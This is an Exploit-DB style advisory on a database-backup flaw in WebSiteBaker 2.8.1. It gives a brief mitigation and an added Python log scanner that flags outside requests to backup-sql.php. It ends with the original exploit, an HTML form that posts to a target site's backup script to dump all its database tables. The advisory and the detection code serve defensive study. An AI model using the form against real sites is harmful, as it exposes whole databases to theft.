Vendor: WebSiteBaker
By: Tr0y-x
CVSS: 7,5 (HIGH)
Title: DataBase Backup Exploit
CWE: N/A
Product Name: WebSiteBaker
Affected Version From: 2.8.1
Affected Version To: May Be Later
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows & Linux
Year: 2010

WebSiteBaker 2.8.1 DataBase Backup Exploit

WebSiteBaker 2.8.1 is vulnerable to a database backup exploit. An attacker can send a crafted POST request to modules/backup/backup-sql.php; depending on the tables value in the request (ALL or WB), the script backs up all tables in the database or only the WB-specific tables.

Mitigation:

Ensure that the backup-sql.php file is not accessible to unauthorized users.
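
To check whether the backup script has already been requested from outside the site, the following Python code scans web server access logs for requests to modules/backup/backup-sql.php. It is an added example, not part of the original advisory or of WebSiteBaker. It assumes the Apache/nginx combined log format and treats a successful request without an on-site Referer as a hint only; the function name, host name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Script path from the form action in the advisory; the [Path] prefix may vary.
BACKUP_PATH = "/modules/backup/backup-sql.php"

# Assumption: Apache/nginx "combined" access-log format.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "[^"]*"'
)

def find_backup_requests(lines, site_host):
    """Return one finding per logged request to the backup script.
    'suspicious' is set when the request succeeded (2xx) and its Referer is
    not a page on site_host. Heuristic only: Referer is client-controlled.
    """
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        # Normalise before comparing: drop query, decode %xx, collapse "//".
        path = re.sub(r"/+", "/", unquote(m["uri"].split("?", 1)[0])).lower()
        if not path.endswith(BACKUP_PATH):
            continue
        try:
            referer_host = (urlsplit(m["referer"]).hostname or "").lower()
        except ValueError:  # malformed Referer header
            referer_host = ""
        served = m["status"].startswith("2")
        findings.append({
            "ip": m["ip"], "time": m["ts"], "method": m["method"],
            "status": int(m["status"]),
            "bytes": 0 if m["size"] == "-" else int(m["size"]),
            "suspicious": served and referer_host != site_host.lower(),
        })
    return findings

# Constructed sample log lines (documentation IP ranges, made-up host).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Mar/2010:10:01:02 +0000] "POST /wb/modules/backup/backup-sql.php HTTP/1.1" 200 48213 "http://www.example.test/wb/" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Mar/2010:10:05:40 +0000] "POST /wb/modules/backup/backup-sql.php HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Mar/2010:10:06:01 +0000] "POST /wb/modules/backup/Backup-SQL.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [25/Mar/2010:10:07:00 +0000] "GET /wb/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

Calling find_backup_requests(SAMPLE_LOG, "www.example.test") returns three findings and marks only the second as suspicious; a 403 on the script, as in the third line, is what the mitigation above should produce for outside clients.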

Exploit-DB raw data:

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Exploit Title : WebSiteBaker 2.8.1 DataBase Backup Exploit

Date : 25 - 3 - 2010

Author : Tr0y-x

Version : 2.8.1 & May Be Later

Tested On : Windows & Linux

My Home : WwW[DoT]SeC-WaR[DoT]CoM

Contact Me : Eg[At]Hack[DoT]Cl

::::::::::::::::::::::::::::::::::::::Exploit:::::::::::::::::::::::::::::::::::::::

<title>WebSiteBaker 2.8.1 DataBase Backup</title>

  <p align="center"> </p>
        <p align="center"><b><font size="5" color="#008000">WebSiteBaker 2.8.1
        DataBase </font></b><font size="5" color="#008000"><b>Backup</b></font></p>
        <p align="center"><font size="5" color="#FFFFFF"><b>By : Tr0y-x</b></font></p>
        <p align="center"><font size="5" color="#008000"><b>
        <a href="http://WwW.SeC-WaR.CoM" style="text-decoration: none">WwW[DoT]SeC-WaR[DoT]CoM</a></b></font></p>
        <p align="center"><font size="5" color="#FF6666"><b>Eg[At]Hack[Dot]Cl</b></font></p>

        <p align="center"> </p>

<body bgcolor="#000000">

<form name="prompt" method="post" action="http://[Site]/[Path]/modules/backup/backup-sql.php">
        <p align="center"><font color="#FF0000">
  <input type="radio" checked="checked" name="tables" value="ALL"><b>Backup
        all tables in database</b><br>
  <input type="radio" name="tables" value="WB"><b>Backup only WB-specific
        tables</b><br><br>
 <input type="submit" name="backup" value="Backup Database" />
        </font></p>
</form>
<p align="center"> </p>
<p align="center"><b><font color="#FFFFFF">Greetz : Alnjm33 - Predator - xXx -
Shooter  - Jamba - Jago-dz & All Sec-War.Com Members</font></b></p>
<p align="center"><font color="#FFFFFF"><b>Specially To My Best Friend XR57</b></font></p>

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

Greetz : Alnjm33 - Predator - xXx - Shooter  - Jamba - Jago-dz & All Sec-War.Com Members

                              Specially To My Best Friend XR57